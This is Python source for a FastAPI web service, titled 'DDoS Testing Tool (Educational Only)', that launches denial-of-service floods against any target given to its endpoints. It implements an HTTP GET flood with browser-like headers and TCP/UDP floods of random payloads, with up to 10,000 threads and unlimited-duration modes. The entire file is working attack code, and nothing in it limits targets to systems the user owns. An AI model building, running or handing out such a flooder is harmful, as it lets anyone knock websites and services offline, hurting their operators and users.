| |
| import uvicorn |
| from fastapi import FastAPI, HTTPException |
| from pydantic import BaseModel, conint, constr |
| import threading |
| import requests |
| import time |
| import logging |
| import socket |
| import random |
| from concurrent.futures import ThreadPoolExecutor |
|
|
| logging.basicConfig(level=logging.INFO) |
| logger = logging.getLogger(__name__) |
|
|
| app = FastAPI(title="DDoS Testing Tool (Educational Only)") |
|
|
| |
| attack_active = False |
| attack_thread = None |
| executor = ThreadPoolExecutor(max_workers=10000) |
|
|
| class Layer7Config(BaseModel): |
| target: str |
| port: int = 80 |
| duration: int = 30 |
| threads: int = 100 |
|
|
| class Layer4Config(BaseModel): |
| target: str |
| port: int = 80 |
| duration: int = 30 |
| threads: int = 100 |
| protocol: constr(regex='^(tcp|udp)$') = "tcp" |
| payload_size: int = 1024 |
|
|
| def generate_payload(size: int) -> bytes: |
| """Generate random payload for Layer 4 attacks""" |
| return bytes(random.getrandbits(8) for _ in range(size)) |
|
|
| def layer7_attack(target_url: str): |
| headers = { |
| "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", |
| "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", |
| "Connection": "keep-alive", |
| "Cache-Control": "no-cache", |
| "Pragma": "no-cache" |
| } |
| session = requests.Session() |
| while attack_active: |
| try: |
| session.get(target_url, headers=headers, timeout=5, verify=False) |
| except: |
| pass |
|
|
| def layer4_attack(target_ip: str, port: int, protocol: str, payload_size: int): |
| sock = None |
| try: |
| if protocol == "tcp": |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) |
| sock.connect((target_ip, port)) |
| else: |
| sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
|
|
| while attack_active: |
| payload = generate_payload(payload_size) |
| if protocol == "tcp": |
| sock.send(payload) |
| else: |
| sock.sendto(payload, (target_ip, port)) |
| time.sleep(0.01) |
| except Exception as e: |
| logger.error(f"Layer 4 attack error: {e}") |
| finally: |
| if sock: |
| sock.close() |
|
|
| def start_layer7_attack(config: Layer7Config): |
| global attack_active |
| attack_active = True |
|
|
| |
| thread_count = config.threads if config.threads != -1 else 10000 |
|
|
| |
| protocol = "https" if config.target.startswith("https") else "http" |
| target_url = f"{config.target}:{config.port}" |
| logger.info(f"Starting Layer 7 attack on {target_url} with {thread_count} threads") |
|
|
| for _ in range(thread_count): |
| executor.submit(layer7_attack, target_url) |
|
|
| |
| if config.duration != -1: |
| time.sleep(config.duration) |
| stop_attack() |
| else: |
| logger.info("Layer 7 attack running indefinitely until manually stopped") |
|
|
| def start_layer4_attack(config: Layer4Config): |
| global attack_active |
| attack_active = True |
|
|
| |
| thread_count = config.threads if config.threads != -1 else 10000 |
|
|
| |
| try: |
| target_ip = socket.gethostbyname(config.target.split("//")[-1].split("/")[0]) |
| except: |
| raise HTTPException(status_code=400, detail="Invalid target URL") |
|
|
| logger.info(f"Starting {config.protocol.upper()} attack on {target_ip}:{config.port} with {thread_count} threads") |
|
|
| for _ in range(thread_count): |
| executor.submit(layer4_attack, target_ip, config.port, config.protocol, config.payload_size) |
|
|
| |
| if config.duration != -1: |
| time.sleep(config.duration) |
| stop_attack() |
| else: |
| logger.info(f"{config.protocol.upper()} attack running indefinitely until manually stopped") |
|
|
| def stop_attack(): |
| global attack_active |
| attack_active = False |
| logger.info("Attack stopped.") |
|
|
| @app.post("/layer7/attack") |
| def launch_layer7_attack(config: Layer7Config): |
| global attack_thread |
| if attack_thread and attack_thread.is_alive(): |
| raise HTTPException(status_code=400, detail="Attack already in progress") |
|
|
| |
| if config.threads != -1 and config.threads > 10000: |
| raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)") |
|
|
| |
| if config.duration != -1 and config.duration > 5000: |
| raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)") |
|
|
| attack_thread = threading.Thread(target=start_layer7_attack, args=(config,), daemon=True) |
| attack_thread.start() |
| return {"status": "layer7_attack_started", "config": config} |
|
|
| @app.post("/layer4/attack") |
| def launch_layer4_attack(config: Layer4Config): |
| global attack_thread |
| if attack_thread and attack_thread.is_alive(): |
| raise HTTPException(status_code=400, detail="Attack already in progress") |
|
|
| |
| if config.threads != -1 and config.threads > 10000: |
| raise HTTPException(status_code=400, detail="Max 10,000 threads allowed (use -1 for unlimited)") |
|
|
| |
| if config.duration != -1 and config.duration > 5000: |
| raise HTTPException(status_code=400, detail="Max duration 5000 seconds (use -1 for unlimited)") |
|
|
| |
| if config.payload_size > 65507: |
| raise HTTPException(status_code=400, detail="Max payload size is 65507 bytes") |
|
|
| attack_thread = threading.Thread(target=start_layer4_attack, args=(config,), daemon=True) |
| attack_thread.start() |
| return {"status": f"{config.protocol}_attack_started", "config": config} |
|
|
| @app.post("/stop") |
| def stop(): |
| stop_attack() |
| return {"status": "attack_stopped"} |
|
|
| @app.get("/status") |
| def status(): |
| return {"attack_active": attack_active} |
|
|
| if __name__ == "__main__": |
| uvicorn.run(app, host="0.0.0.0", port=8000) |
|
|
